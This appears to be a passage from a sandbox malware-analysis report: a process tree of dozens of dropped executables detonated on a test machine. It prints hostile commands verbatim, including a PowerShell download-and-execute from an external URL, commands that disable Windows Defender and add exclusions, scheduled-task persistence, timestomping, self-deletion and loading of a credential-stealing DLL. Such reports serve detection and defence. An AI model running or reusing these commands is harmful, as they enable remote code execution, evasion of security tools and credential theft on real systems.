C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\Admin\AppData\Local\Temp\bxthavdhfvwtyfoydvlfz"
4⤵
PID:768

C:\Users\Admin\AppData\Local\Temp\ori.exe
"C:\Users\Admin\AppData\Local\Temp\ori.exe"
4⤵
PID:1892

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:6684

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:4152

C:\Users\Admin\AppData\Local\Temp\a\2.exe
"C:\Users\Admin\AppData\Local\Temp\a\2.exe"
2⤵
- Executes dropped EXE
PID:4212

C:\Users\Admin\AppData\Local\Temp\a\DIV.exe
"C:\Users\Admin\AppData\Local\Temp\a\DIV.exe"
2⤵
PID:3884

C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe"
2⤵
PID:4584

C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe"
3⤵
PID:5736

C:\Users\Admin\AppData\Local\Temp\a\cc.exe
"C:\Users\Admin\AppData\Local\Temp\a\cc.exe"
2⤵
PID:3976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 844
3⤵
- Program crash
PID:912

C:\Users\Admin\AppData\Local\Temp\a\WindowsApp1.exe
"C:\Users\Admin\AppData\Local\Temp\a\WindowsApp1.exe"
2⤵
PID:1580

C:\Users\Admin\AppData\Local\Temp\a\M.exe
"C:\Users\Admin\AppData\Local\Temp\a\M.exe"
2⤵
PID:224

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:1420

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:4148

C:\Users\Admin\AppData\Local\Temp\a\ga.exe
"C:\Users\Admin\AppData\Local\Temp\a\ga.exe"
2⤵
PID:4172

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:4032

C:\Users\Admin\AppData\Local\Temp\a\Nano.exe
"C:\Users\Admin\AppData\Local\Temp\a\Nano.exe"
2⤵
PID:4064

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:3696

C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe"
2⤵
PID:552

C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe"
3⤵
PID:5656

C:\Users\Admin\AppData\Local\Temp\a\smss.exe
"C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
2⤵
PID:1608

C:\Users\Admin\AppData\Local\Temp\a\smss.exe
"C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
3⤵
PID:2264

C:\Users\Admin\AppData\Local\Temp\a\R.exe
"C:\Users\Admin\AppData\Local\Temp\a\R.exe"
2⤵
PID:4392

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:2616

C:\Users\Admin\AppData\Local\Temp\a\ar.exe
"C:\Users\Admin\AppData\Local\Temp\a\ar.exe"
2⤵
PID:4876

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:5104

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:4896

C:\Users\Admin\AppData\Local\Temp\a\ARR.exe
"C:\Users\Admin\AppData\Local\Temp\a\ARR.exe"
2⤵
PID:4144

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:3716

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe"
2⤵
PID:4080

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:6064

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6064 -s 452
4⤵
- Program crash
PID:5600

C:\Users\Admin\AppData\Local\Temp\a\D.exe
"C:\Users\Admin\AppData\Local\Temp\a\D.exe"
2⤵
PID:3396

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:648

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:4076

C:\Users\Admin\AppData\Local\Temp\a\NEV.exe
"C:\Users\Admin\AppData\Local\Temp\a\NEV.exe"
2⤵
PID:3784

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:4708

C:\Windows\SysWOW64\autofmt.exe
"C:\Windows\SysWOW64\autofmt.exe"
2⤵
PID:4844

C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
2⤵
PID:4324

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:6696

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6696 -s 460
4⤵
- Program crash
PID:7108

C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe
"C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe"
2⤵
PID:220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe
3⤵
PID:4496

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
4⤵
PID:4456

C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe"
2⤵
PID:5012

C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe"
3⤵
PID:6912

C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe
"C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe"
2⤵
PID:4596

C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe
"C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe"
3⤵
PID:1088

C:\Users\Admin\AppData\Local\Temp\a\wasx.exe
"C:\Users\Admin\AppData\Local\Temp\a\wasx.exe"
2⤵
PID:2828

C:\Users\Admin\AppData\Local\Temp\a\wasx.exe
"C:\Users\Admin\AppData\Local\Temp\a\wasx.exe"
3⤵
PID:3600

C:\Users\Admin\AppData\Local\Temp\a\dd.exe
"C:\Users\Admin\AppData\Local\Temp\a\dd.exe"
2⤵
PID:3556

C:\Users\Admin\AppData\Local\Temp\a\dd.exe
"C:\Users\Admin\AppData\Local\Temp\a\dd.exe"
3⤵
PID:4076

C:\Users\Admin\AppData\Local\Temp\a\postmon.exe
"C:\Users\Admin\AppData\Local\Temp\a\postmon.exe"
2⤵
PID:2724

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')"
3⤵
PID:4848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')
4⤵
PID:5580

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\a\postmon.exe" >> NUL
3⤵
PID:5576

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:2836

C:\Users\Admin\AppData\Local\Temp\a\U2th5k1keGkDeMw.exe
"C:\Users\Admin\AppData\Local\Temp\a\U2th5k1keGkDeMw.exe"
2⤵
PID:5016

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:4172

C:\Users\Admin\AppData\Local\Temp\a\red.exe
"C:\Users\Admin\AppData\Local\Temp\a\red.exe"
2⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\a\Facebook.exe
"C:\Users\Admin\AppData\Local\Temp\a\Facebook.exe"
2⤵
PID:5316

C:\Users\Admin\AppData\Local\Temp\a\photo430.exe
"C:\Users\Admin\AppData\Local\Temp\a\photo430.exe"
2⤵
PID:5660

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\v0373564.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\v0373564.exe
3⤵
PID:5728

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\v6917317.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\v6917317.exe
4⤵
PID:5768

C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\v1272904.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\v1272904.exe
5⤵
PID:5820

C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\a6218418.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\a6218418.exe
6⤵
PID:5864

C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\b8582505.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\b8582505.exe
6⤵
PID:6024

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
7⤵
PID:5856

C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\c1590977.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\c1590977.exe
5⤵
PID:5392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 948
6⤵
- Program crash
PID:5616

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\d2455459.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\d2455459.exe
4⤵
PID:1216

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\metado.exe
"C:\Users\Admin\AppData\Local\Temp\a9e2a16078\metado.exe"
5⤵
PID:6072

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\e3977726.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\e3977726.exe
3⤵
PID:1840

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
4⤵
PID:2448

C:\Users\Admin\AppData\Local\Temp\a\fristname.exe
"C:\Users\Admin\AppData\Local\Temp\a\fristname.exe"
2⤵
PID:5708

C:\Users\Admin\AppData\Local\Temp\ae3108e6c23af96b9aac776041f0203a.exe
"C:\Users\Admin\AppData\Local\Temp\ae3108e6c23af96b9aac776041f0203a.exe"
3⤵
PID:5692

C:\Users\Admin\AppData\Local\Temp\BitDefendMS.exe
"C:\Users\Admin\AppData\Local\Temp\BitDefendMS.exe"
3⤵
PID:5744

C:\Users\Admin\AppData\Local\Temp\Builtt.exe
"C:\Users\Admin\AppData\Local\Temp\Builtt.exe"
3⤵
PID:5876

C:\Users\Admin\AppData\Local\Temp\Builtt.exe
"C:\Users\Admin\AppData\Local\Temp\Builtt.exe"
4⤵
PID:5148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "net session"
5⤵
PID:5932

C:\Windows\system32\net.exe
net session
6⤵
PID:5900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
7⤵
PID:96

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
5⤵
PID:5520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
6⤵
PID:5536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
PID:3176

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
PID:5608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:4860

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
PID:1692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
5⤵
PID:5396

C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
6⤵
PID:644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
5⤵
PID:5248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
6⤵
PID:4472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builtt.exe'"
5⤵
PID:5824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builtt.exe'
6⤵
PID:6024

C:\Users\Admin\AppData\Local\Temp\a\IE_CACHE.exe
"C:\Users\Admin\AppData\Local\Temp\a\IE_CACHE.exe"
2⤵
PID:6000

C:\Users\Admin\AppData\Local\Temp\a\IE_CACHE.exe
"C:\Users\Admin\AppData\Local\Temp\a\IE_CACHE.exe"
3⤵
PID:7160

C:\Users\Admin\AppData\Local\Temp\a\d9ff4ed3.exe
"C:\Users\Admin\AppData\Local\Temp\a\d9ff4ed3.exe"
2⤵
PID:5256

C:\Users\Admin\AppData\Local\Temp\a\wall.exe
"C:\Users\Admin\AppData\Local\Temp\a\wall.exe"
2⤵
PID:5712

C:\Users\Admin\AppData\Local\Temp\aafg31.exe
"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
3⤵
PID:6580

C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe
"C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe"
3⤵
PID:7028

C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
"C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"
4⤵
PID:6808

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe" /F
5⤵
- Creates scheduled task(s)
PID:1776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\6d73a97b0c" /P "Admin:N"&&CACLS "..\6d73a97b0c" /P "Admin:R" /E&&Exit
5⤵
PID:5832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:5404

C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:N"
6⤵
PID:6192

C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:R" /E
6⤵
PID:5816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:6644

C:\Windows\SysWOW64\cacls.exe
CACLS "..\6d73a97b0c" /P "Admin:N"
6⤵
PID:5796

C:\Windows\SysWOW64\cacls.exe
CACLS "..\6d73a97b0c" /P "Admin:R" /E
6⤵
PID:6804

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
5⤵
PID:6772

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
6⤵
PID:6928

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6928 -s 596
7⤵
- Program crash
PID:6604

C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
3⤵
PID:6772

C:\Users\Admin\AppData\Local\Temp\a\WWW3_64.exe
"C:\Users\Admin\AppData\Local\Temp\a\WWW3_64.exe"
2⤵
PID:5324

C:\Users\Admin\AppData\Local\Temp\a\gogw.exe
"C:\Users\Admin\AppData\Local\Temp\a\gogw.exe"
2⤵
PID:6824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN MicrosoftEdgeUpdateTaskMachineUARun.exe /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe"
3⤵
PID:7000

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN MicrosoftEdgeUpdateTaskMachineUARun.exe /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
4⤵
- Creates scheduled task(s)
PID:7136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name CreationTime -Value \"06/13/2022 3:16 PM\""
3⤵
PID:4136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name LastWriteTime -Value \"06/13/2022 3:16 PM\""
3⤵
PID:5572

C:\Users\Admin\AppData\Local\Temp\a\trust.exe
"C:\Users\Admin\AppData\Local\Temp\a\trust.exe"
2⤵
PID:6560

C:\Users\Admin\AppData\Local\Temp\a\aaa1.exe
"C:\Users\Admin\AppData\Local\Temp\a\aaa1.exe"
2⤵
PID:6500

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:6896

C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
2⤵
PID:3484

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:6564

C:\Users\Admin\AppData\Local\Temp\a\netTime.exe
"C:\Users\Admin\AppData\Local\Temp\a\netTime.exe"
2⤵
PID:5012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
3⤵
PID:7020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
3⤵
PID:6708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB7F.tmp.bat""
3⤵
PID:5136

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:6744

C:\ProgramData\GitLibedll\YKNH.exe
"C:\ProgramData\GitLibedll\YKNH.exe"
4⤵
PID:4812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
5⤵
PID:1224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
5⤵
PID:5944

C:\Users\Admin\AppData\Local\Temp\a\tg.exe
"C:\Users\Admin\AppData\Local\Temp\a\tg.exe"
2⤵
PID:7128

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:2184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 304
3⤵
- Program crash
PID:3560

C:\Users\Admin\AppData\Local\Temp\a\1.exe
"C:\Users\Admin\AppData\Local\Temp\a\1.exe"
2⤵
PID:3484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN Soft /TR C:\Users\Admin\AppData\Roaming\WindowsAutoUpdate.exe"
3⤵
PID:6608

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN Soft /TR C:\Users\Admin\AppData\Roaming\WindowsAutoUpdate.exe
4⤵
- Creates scheduled task(s)
PID:7092

C:\Users\Admin\AppData\Local\Temp\a\putty.exe
"C:\Users\Admin\AppData\Local\Temp\a\putty.exe"
2⤵
PID:6744

C:\Users\Admin\AppData\Local\Temp\a\v.exe
"C:\Users\Admin\AppData\Local\Temp\a\v.exe"
2⤵
PID:3556

C:\Program Files (x86)\Google\Temp\GUM153.tmp\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Temp\GUM153.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty"
3⤵
PID:6656

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
4⤵
PID:5624

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
4⤵
PID:6928

C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
5⤵
PID:504

C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
5⤵
PID:5052

C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
5⤵
PID:2156

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4xMjIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4xMjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QUI1RTg3RTctOTk0MS00NjI0LUJBQzEtRTcxRDY2N0RBNURDfSIgdXNlcmlkPSJ7RUJCNThDNkMtM0JBMy00NkM1LUFGMTItREI0M0I3N0U4QkNCfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezVCODI3NDJGLTZBREYtNEUxQy1BRUEyLUQwMjU5OUUxQTlFMX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xNTA2My4wIiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjE1MSIgbmV4dHZlcnNpb249IjEuMy4zNi4xMjIiIGxhbmc9ImVuIiBicmFuZD0iQ0hCRiIgY2xpZW50PSIiIGlpZD0iezQ2MTFFMDg3LUNCNzAtMjQ0Qi05MjAyLUY2MDUzNTdBMDJGNH0iPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iNzc5MDYiLz48L2FwcD48L3JlcXVlc3Q-
4⤵
PID:4412

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty" /installsource taggedmi /sessionid "{AB5E87E7-9941-4624-BAC1-E71D667DA5DC}"
4⤵
PID:68

C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe
"C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe"
2⤵
PID:792

C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe
"C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe"
3⤵
PID:4372

C:\Users\Admin\AppData\Local\Temp\a\mslink1.exe
"C:\Users\Admin\AppData\Local\Temp\a\mslink1.exe"
2⤵
PID:2436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 1140
3⤵
- Program crash
PID:580

C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe"
2⤵
PID:596

C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe"
3⤵
PID:5404

C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe"
3⤵
PID:6244

C:\Users\Admin\AppData\Local\Temp\a\macrigan2.1.exe
"C:\Users\Admin\AppData\Local\Temp\a\macrigan2.1.exe"
2⤵
PID:6156

C:\Users\Admin\AppData\Local\Temp\a\macrigan2.1.exe
"C:\Users\Admin\AppData\Local\Temp\a\macrigan2.1.exe"
3⤵
PID:6404

C:\Users\Admin\AppData\Local\Temp\a\p0aw25.exe
"C:\Users\Admin\AppData\Local\Temp\a\p0aw25.exe"
2⤵
PID:6568

C:\Users\Admin\AppData\Local\Temp\a\clp6.exe
"C:\Users\Admin\AppData\Local\Temp\a\clp6.exe"
2⤵
PID:5444

C:\ProgramData\h5gb4fg\g3f31sd.exe
C:\ProgramData\h5gb4fg\g3f31sd.exe
3⤵
PID:4836

C:\Users\Admin\AppData\Local\Temp\a\redline.exe
"C:\Users\Admin\AppData\Local\Temp\a\redline.exe"
2⤵
PID:6388

C:\Users\Admin\AppData\Local\Temp\a\dd4add6r.s6xlt.exe
"C:\Users\Admin\AppData\Local\Temp\a\dd4add6r.s6xlt.exe"
2⤵
- Modifies Windows Defender Real-time Protection settings
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5052

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:4144

C:\Users\Admin\AppData\Local\Temp\a\Rebcoana.exe
"C:\Users\Admin\AppData\Local\Temp\a\Rebcoana.exe"
2⤵
PID:5768

C:\Users\Admin\AppData\Local\Temp\a\BaldiTrojan-x64.exe
"C:\Users\Admin\AppData\Local\Temp\a\BaldiTrojan-x64.exe"
2⤵
PID:1456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c CleanZUpdater.bat
3⤵
PID:6920

C:\Baldi\Baldi.exe
